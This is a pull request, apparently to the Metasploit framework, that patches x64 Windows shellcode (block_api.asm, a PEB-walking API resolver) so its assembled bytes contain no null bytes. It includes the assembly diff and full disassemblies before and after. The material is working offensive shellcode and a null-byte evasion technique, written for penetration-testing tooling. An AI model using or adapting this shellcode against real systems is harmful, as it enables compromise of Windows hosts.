### PR TITLE
Avoid NULLBYTE

### DIFF
--- a/external/source/shellcode/windows/x64/src/block/block_api.asm
+++ b/external/source/shellcode/windows/x64/src/block/block_api.asm
@@ -2,7 +2,9 @@
 ; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
 ; Compatible: Windows 7 / Server 2003 and newer
 ; Architecture: x64
-; Size: 200 bytes
+; Size: 203 bytes
+;
+; 2023-04-24 Hotfix by Helvio Junior (M4v3r1ck) to avoid NULLBYTE
 ;-----------------------------------------------------------------------------;
 
 [BITS 64]
@@ -54,7 +56,9 @@ not_lowercase:                ;
   ; their may be a PE32 module present in the PEB's module list, (typicaly the main module).
   ; as we are using the win64 PEB ([gs:96]) we wont see the wow64 modules present in the win32 PEB ([fs:48])
   jne get_next_mod1           ; if not, proceed to the next module
-  mov eax, dword [rax+0x88]   ; Get export tables RVA
+  xor rsi, rsi                ; clear rsi
+  mov sil, 0x88               ; Set rsi as 0x88 using only 1 byte register (sil)
+  mov eax, dword [rax+rsi]    ; Get export tables RVA => use rsi to calculate 0x88 to avoid NULLBYTE
   test rax, rax               ; Test if no export address table is present
   jz get_next_mod1            ; If no EAT present, process the next module
   add rax, rdx                ; Add the modules base address


### PR DESCRIPTION
Hotfix to avoid NULLBYTE ate block_api 64 bits.

This hotfix increased the size of assembled data in 3 bytes as follows.

#############
## Original

```
$ nasm block_api.asm -o /tmp/original.o
$ wc -c /tmp/original.o
     200 /tmp/original.o

```
#############
## Modified

```
$ nasm block_api.asm -o /tmp/modified.o
$ wc -c /tmp/modified.o
     203 /tmp/modified.o

```

#########################
## Original Disassembly

```
$ objdump -D -Mintel,x86-64 -b binary -m i386 /tmp/original.o

original.o:     file format binary


Disassembly of section .data:

00000000 <.data>:
   0:   41 51                   push   r9
   2:   41 50                   push   r8
   4:   52                      push   rdx
   5:   51                      push   rcx
   6:   56                      push   rsi
   7:   48 31 d2                xor    rdx,rdx
   a:   65 48 8b 52 60          mov    rdx,QWORD PTR gs:[rdx+0x60]
   f:   48 8b 52 18             mov    rdx,QWORD PTR [rdx+0x18]
  13:   48 8b 52 20             mov    rdx,QWORD PTR [rdx+0x20]
  17:   48 8b 72 50             mov    rsi,QWORD PTR [rdx+0x50]
  1b:   48 0f b7 4a 4a          movzx  rcx,WORD PTR [rdx+0x4a]
  20:   4d 31 c9                xor    r9,r9
  23:   48 31 c0                xor    rax,rax
  26:   ac                      lods   al,BYTE PTR ds:[rsi]
  27:   3c 61                   cmp    al,0x61
  29:   7c 02                   jl     0x2d
  2b:   2c 20                   sub    al,0x20
  2d:   41 c1 c9 0d             ror    r9d,0xd
  31:   41 01 c1                add    r9d,eax
  34:   e2 ed                   loop   0x23
  36:   52                      push   rdx
  37:   41 51                   push   r9
  39:   48 8b 52 20             mov    rdx,QWORD PTR [rdx+0x20]
  3d:   8b 42 3c                mov    eax,DWORD PTR [rdx+0x3c]
  40:   48 01 d0                add    rax,rdx
  43:   66 81 78 18 0b 02       cmp    WORD PTR [rax+0x18],0x20b
  49:   75 72                   jne    0xbd
  4b:   8b 80 88 00 00 00       mov    eax,DWORD PTR [rax+0x88]
  51:   48 85 c0                test   rax,rax
  54:   74 67                   je     0xbd
  56:   48 01 d0                add    rax,rdx
  59:   50                      push   rax
  5a:   8b 48 18                mov    ecx,DWORD PTR [rax+0x18]
  5d:   44 8b 40 20             mov    r8d,DWORD PTR [rax+0x20]
  61:   49 01 d0                add    r8,rdx
  64:   e3 56                   jrcxz  0xbc
  66:   48 ff c9                dec    rcx
  69:   41 8b 34 88             mov    esi,DWORD PTR [r8+rcx*4]
  6d:   48 01 d6                add    rsi,rdx
  70:   4d 31 c9                xor    r9,r9
  73:   48 31 c0                xor    rax,rax
  76:   ac                      lods   al,BYTE PTR ds:[rsi]
  77:   41 c1 c9 0d             ror    r9d,0xd
  7b:   41 01 c1                add    r9d,eax
  7e:   38 e0                   cmp    al,ah
  80:   75 f1                   jne    0x73
  82:   4c 03 4c 24 08          add    r9,QWORD PTR [rsp+0x8]
  87:   45 39 d1                cmp    r9d,r10d
  8a:   75 d8                   jne    0x64
  8c:   58                      pop    rax
  8d:   44 8b 40 24             mov    r8d,DWORD PTR [rax+0x24]
  91:   49 01 d0                add    r8,rdx
  94:   66 41 8b 0c 48          mov    cx,WORD PTR [r8+rcx*2]
  99:   44 8b 40 1c             mov    r8d,DWORD PTR [rax+0x1c]
  9d:   49 01 d0                add    r8,rdx
  a0:   41 8b 04 88             mov    eax,DWORD PTR [r8+rcx*4]
  a4:   48 01 d0                add    rax,rdx
  a7:   41 58                   pop    r8
  a9:   41 58                   pop    r8
  ab:   5e                      pop    rsi
  ac:   59                      pop    rcx
  ad:   5a                      pop    rdx
  ae:   41 58                   pop    r8
  b0:   41 59                   pop    r9
  b2:   41 5a                   pop    r10
  b4:   48 83 ec 20             sub    rsp,0x20
  b8:   41 52                   push   r10
  ba:   ff e0                   jmp    rax
  bc:   58                      pop    rax
  bd:   41 59                   pop    r9
  bf:   5a                      pop    rdx
  c0:   48 8b 12                mov    rdx,QWORD PTR [rdx]
  c3:   e9 4f ff ff ff          jmp    0x17
```

#########################
## Modified Disassembly
## 

```
$ objdump -D -Mintel,x86-64 -b binary -m i386 /tmp/modified.o

modified.o:     file format binary


Disassembly of section .data:

00000000 <.data>:
   0:   41 51                   push   r9
   2:   41 50                   push   r8
   4:   52                      push   rdx
   5:   51                      push   rcx
   6:   56                      push   rsi
   7:   48 31 d2                xor    rdx,rdx
   a:   65 48 8b 52 60          mov    rdx,QWORD PTR gs:[rdx+0x60]
   f:   48 8b 52 18             mov    rdx,QWORD PTR [rdx+0x18]
  13:   48 8b 52 20             mov    rdx,QWORD PTR [rdx+0x20]
  17:   48 8b 72 50             mov    rsi,QWORD PTR [rdx+0x50]
  1b:   48 0f b7 4a 4a          movzx  rcx,WORD PTR [rdx+0x4a]
  20:   4d 31 c9                xor    r9,r9
  23:   48 31 c0                xor    rax,rax
  26:   ac                      lods   al,BYTE PTR ds:[rsi]
  27:   3c 61                   cmp    al,0x61
  29:   7c 02                   jl     0x2d
  2b:   2c 20                   sub    al,0x20
  2d:   41 c1 c9 0d             ror    r9d,0xd
  31:   41 01 c1                add    r9d,eax
  34:   e2 ed                   loop   0x23
  36:   52                      push   rdx
  37:   41 51                   push   r9
  39:   48 8b 52 20             mov    rdx,QWORD PTR [rdx+0x20]
  3d:   8b 42 3c                mov    eax,DWORD PTR [rdx+0x3c]
  40:   48 01 d0                add    rax,rdx
  43:   66 81 78 18 0b 02       cmp    WORD PTR [rax+0x18],0x20b
  49:   75 75                   jne    0xc0
  4b:   48 31 f6                xor    rsi,rsi
  4e:   40 b6 88                mov    sil,0x88
  51:   8b 04 30                mov    eax,DWORD PTR [rax+rsi*1]
  54:   48 85 c0                test   rax,rax
  57:   74 67                   je     0xc0
  59:   48 01 d0                add    rax,rdx
  5c:   50                      push   rax
  5d:   8b 48 18                mov    ecx,DWORD PTR [rax+0x18]
  60:   44 8b 40 20             mov    r8d,DWORD PTR [rax+0x20]
  64:   49 01 d0                add    r8,rdx
  67:   e3 56                   jrcxz  0xbf
  69:   48 ff c9                dec    rcx
  6c:   41 8b 34 88             mov    esi,DWORD PTR [r8+rcx*4]
  70:   48 01 d6                add    rsi,rdx
  73:   4d 31 c9                xor    r9,r9
  76:   48 31 c0                xor    rax,rax
  79:   ac                      lods   al,BYTE PTR ds:[rsi]
  7a:   41 c1 c9 0d             ror    r9d,0xd
  7e:   41 01 c1                add    r9d,eax
  81:   38 e0                   cmp    al,ah
  83:   75 f1                   jne    0x76
  85:   4c 03 4c 24 08          add    r9,QWORD PTR [rsp+0x8]
  8a:   45 39 d1                cmp    r9d,r10d
  8d:   75 d8                   jne    0x67
  8f:   58                      pop    rax
  90:   44 8b 40 24             mov    r8d,DWORD PTR [rax+0x24]
  94:   49 01 d0                add    r8,rdx
  97:   66 41 8b 0c 48          mov    cx,WORD PTR [r8+rcx*2]
  9c:   44 8b 40 1c             mov    r8d,DWORD PTR [rax+0x1c]
  a0:   49 01 d0                add    r8,rdx
  a3:   41 8b 04 88             mov    eax,DWORD PTR [r8+rcx*4]
  a7:   48 01 d0                add    rax,rdx
  aa:   41 58                   pop    r8
  ac:   41 58                   pop    r8
  ae:   5e                      pop    rsi
  af:   59                      pop    rcx
  b0:   5a                      pop    rdx
  b1:   41 58                   pop    r8
  b3:   41 59                   pop    r9
  b5:   41 5a                   pop    r10
  b7:   48 83 ec 20             sub    rsp,0x20
  bb:   41 52                   push   r10
  bd:   ff e0                   jmp    rax
  bf:   58                      pop    rax
  c0:   41 59                   pop    r9
  c2:   5a                      pop    rdx
  c3:   48 8b 12                mov    rdx,QWORD PTR [rdx]
  c6:   e9 4c ff ff ff          jmp    0x17
```